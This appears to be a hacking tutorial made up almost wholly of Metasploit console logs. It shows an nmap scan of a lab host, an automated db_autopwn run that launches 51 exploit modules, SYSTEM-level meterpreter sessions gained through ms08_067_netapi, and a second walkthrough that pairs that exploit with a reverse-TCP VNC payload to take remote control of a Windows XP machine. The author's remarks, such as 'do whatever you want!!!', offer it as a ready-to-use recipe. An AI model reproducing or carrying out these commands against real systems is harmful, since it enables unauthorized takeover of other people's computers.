msf > db_status
[*] postgresql connected to msf3
msf > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
msf > db_nmap 192.168.56.101
[*] Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2011-09-30 07:49 WIT
[*] Nmap: Nmap scan report for 192.168.56.101
[*] Nmap: Host is up (0.0011s latency).
[*] Nmap: Not shown: 996 closed ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 135/tcp open msrpc
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: 3389/tcp open ms-term-serv
[*] Nmap: MAC Address: 08:00:27:2B:15:80 (Cadmus Computer Systems)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 1.40 seconds
msf > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.56.101 08:00:27:2B:15:80
msf > db_autopwn -p -t -e
[*] Analysis completed in 8 seconds (0 vulns / 0 refs)
[*]
[*] =========================================================================
[*] Matching Exploit Modules
[*] =========================================================================
[*] 192.168.56.101:135 exploit/windows/dcerpc/ms03_026_dcom (port match)
[*] 192.168.56.101:139 exploit/freebsd/samba/trans2open (port match)
[*] 192.168.56.101:139 exploit/linux/samba/chain_reply (port match)
[*] 192.168.56.101:139 exploit/linux/samba/lsa_transnames_heap (port match)
[*] 192.168.56.101:139 exploit/linux/samba/trans2open (port match)
[*] 192.168.56.101:139 exploit/multi/samba/nttrans (port match)
[*] 192.168.56.101:139 exploit/multi/samba/usermap_script (port match)
[*] 192.168.56.101:139 exploit/netware/smb/lsass_cifs (port match)
[*] 192.168.56.101:139 exploit/osx/samba/lsa_transnames_heap (port match)
[*] 192.168.56.101:139 exploit/solaris/samba/trans2open (port match)
[*] 192.168.56.101:139 exploit/windows/brightstor/ca_arcserve_342 (port match)
[*] 192.168.56.101:139 exploit/windows/brightstor/etrust_itm_alert (port match)
[*] 192.168.56.101:139 exploit/windows/smb/ms03_049_netapi (port match)
[*] 192.168.56.101:139 exploit/windows/smb/ms04_011_lsass (port match)
[*] 192.168.56.101:139 exploit/windows/smb/ms04_031_netdde (port match)
----------------------------------cut here------------------------------------------
(1/51 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.56.101:135...
[*] (2/51 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.56.101:139...
[*] (3/51 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.56.101:139...
[*] (4/51 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.56.101:139...
[*] (5/51 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.56.101:139...
[*] (6/51 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.56.101:139...
[*] (7/51 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.56.101:139...
[*] (8/51 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.56.101:139...
[*] (9/51 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.56.101:139...
[*] (10/51 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.56.101:139...
[*] (11/51 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.56.101:139...
[*] (12/51 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.56.101:139...
[*] (13/51 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.56.101:139...
[*] (14/51 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.56.101:139...
[*] (15/51 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.56.101:139...
[*] (16/51 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.56.101:139...
[*] (17/51 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.56.101:139...
[*] (18/51 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.56.101:139...
[*] (19/51 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.56.101:139...
[*] (20/51 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.56.101:139...
[*] (21/51 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 192.168.56.101:139...
[*] (22/51 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.56.101:139...
[*] (23/51 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 192.168.56.101:139...
[*] (24/51 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.56.101:139...
[*] (25/51 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.56.101:139...
[*] (26/51 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.56.101:139...
----------------------------------cut here------------------------------------------
(49/51 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.56.101:445...
[*] (50/51 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.56.101:445...
[*] (51/51 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.56.101:445...
[*] (51/51 [0 sessions]): Waiting on 38 launched modules to finish execution...
[*] (51/51 [0 sessions]): Waiting on 25 launched modules to finish execution...
[*] Meterpreter session 1 opened (192.168.56.1:49973 -> 192.168.56.101:20907) at 2011-09-30 07:51:35 +0700
[*] (51/51 [1 sessions]): Waiting on 11 launched modules to finish execution...
[*] Meterpreter session 2 opened (192.168.56.1:58149 -> 192.168.56.101:33496) at 2011-09-30 07:51:37 +0700
[*] (51/51 [2 sessions]): Waiting on 7 launched modules to finish execution...
[*] (51/51 [2 sessions]): Waiting on 6 launched modules to finish execution...
Active sessions
===============
Id Type Information Connection Via
-- ---- ----------- ---------- ---
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ SADAHIKE 192.168.56.1:49973 -> 192.168.56.101:20907 exploit/windows/smb/ms08_067_netapi
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ SADAHIKE 192.168.56.1:58149 -> 192.168.56.101:33496 exploit/windows/smb/ms08_067_netapi
[*] =========================================================================
msf > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 1952 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
do whatever you want!!!
OR TRY THIS
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/vncinject/reverse_tcp
PAYLOAD => windows/vncinject/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/vncinject/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AUTOVNC true yes Automatically launch VNC viewer if present
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy
VNCPORT 5900 yes The local port to use for the VNC proxy
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (445440 bytes) to 192.168.56.101
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vncviewer.
[*] Session 3 created in the background.
VNC Viewer Free Edition 4.1.1 for X - built Apr 9 2010 15:52:37
Copyright (C) 2002-2005 RealVNC Ltd.
See http://www.realvnc.com for information on VNC.
msf exploit(ms08_067_netapi) >
Fri Sep 30 08:14:30 2011
CConn: connected to host 127.0.0.1 port 5900
Fri Sep 30 08:14:31 2011
CConnection: Server supports RFB protocol version 3.8
CConnection: Using RFB protocol version 3.8
TXImage: Using default colormap and visual, TrueColor, depth 24.
CConn: Using pixel format depth 6 (8bpp) rgb222
CConn: Using ZRLE encoding
CConn: Throughput 3781 kbit/s - changing to hextile encoding
CConn: Throughput 3781 kbit/s - changing to full colour
CConn: Using pixel format depth 24 (32bpp) little-endian rgb888
CConn: Using hextile encoding
Fri Sep 30 08:14:32 2011
CConn: Throughput 20000 kbit/s - changing to raw encoding
CConn: Using raw encoding
now you can control the windows on your on.....:p